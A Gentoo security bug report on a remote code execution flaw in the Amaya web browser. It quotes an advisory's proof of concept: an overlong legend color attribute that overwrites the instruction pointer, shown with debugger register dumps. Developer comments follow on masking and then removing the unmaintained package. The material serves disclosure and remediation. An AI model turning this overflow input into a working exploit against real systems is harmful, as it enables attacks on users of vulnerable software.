Bug 129874 - www-client/amaya: <= 9.4 Remote Code Execution
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High enhancement
Assignee: Gentoo Security
URL: http://morph3us.org/advisories/200604...
Whiteboard: B2 [masked] ed PENDING REMOVAL Oct 16th
Keywords: PMASKED
Duplicates: 130900
Depends on: 83394
Reported: 2006-04-13 15:38 UTC by Eduardo Tongson
Modified: 2006-11-04 11:36 UTC
CC: 3 users
Description Eduardo Tongson 2006-04-13 15:38:12 UTC
Amaya <= 9.4 susceptible to remote code execution. 
Since Amaya is unmaintained, I suggest that it be masked.

"""snip"""
The following code snippet forces Amaya 9.4 to crash:
> <legend color="Ax200">

> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206
>
>         00516114 56               push    esi
>         00516115 57               push    edi
>         00516116 33ff             xor     edi,edi
>         00516118 33f6             xor     esi,esi
>         0051611a 3bcf             cmp     ecx,edi
>         0051611c 893d943df101     mov     [amaya+0x1b13d94
>                                             (01f13d94)],edi
>         00516122 7511             jnz     amaya+0x116135 (00516135)
>         00516124 6a0a             push    0xa
>         00516126 e825d80500       call    amaya+0x173950 (00573950)
>         0051612b 83c404           add     esp,0x4
>         0051612e 8bd7             mov     edx,edi
>         00516130 8bc6             mov     eax,esi
>         00516132 5f               pop     edi
>         00516133 5e               pop     esi
>         00516134 c3               ret
> FAULT ->00516135 8b4134           mov     eax,[ecx+0x34]
>                                             ds:0023:41414175=????????
>         00516138 3bc7             cmp     eax,edi
>         0051613a 74f2             jz      amaya+0x11612e (0051612e)
>         0051613c 8b4938           mov     ecx,[ecx+0x38]
>         0051613f 5f               pop     edi
>         00516140 8bd1             mov     edx,ecx
>         00516142 5e               pop     esi
>         00516143 c3               ret
>         Nopslide..

We are able to control the EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>

> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000202
>
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html
"""snip"""
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2006-04-15 05:49:10 UTC
We should post a call to -dev to find some maintainer here.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2006-04-22 03:19:49 UTC
Call for maintainer posted
Comment 3 Jakub Moc (RETIRED) gentoo-dev 2006-04-22 23:48:56 UTC
*** Bug 130900 has been marked as a duplicate of this bug. ***
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2006-04-28 12:17:32 UTC
We have an ebuild but nobody wants to maintain this. I vote for masking...
Comment 5 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-04-28 21:55:42 UTC
I'm for masking as well.
Comment 6 Stefan Cornelius (RETIRED) gentoo-dev 2006-04-30 06:15:02 UTC
masked it, keeping the bug open as enhancement until we have a fix or remove the package.
Comment 7 Alec Warner (RETIRED) archtester gentoo-dev Security 2006-08-03 16:20:05 UTC
(In reply to comment #6)
> masked it, keeping the bug open as enhancement until we have a fix or remove
> the package.
> 

treecleaners would like to remove the package.
Comment 8 Christian Heim (RETIRED) gentoo-dev 2006-11-04 11:36:11 UTC
www-client/amaya is removed!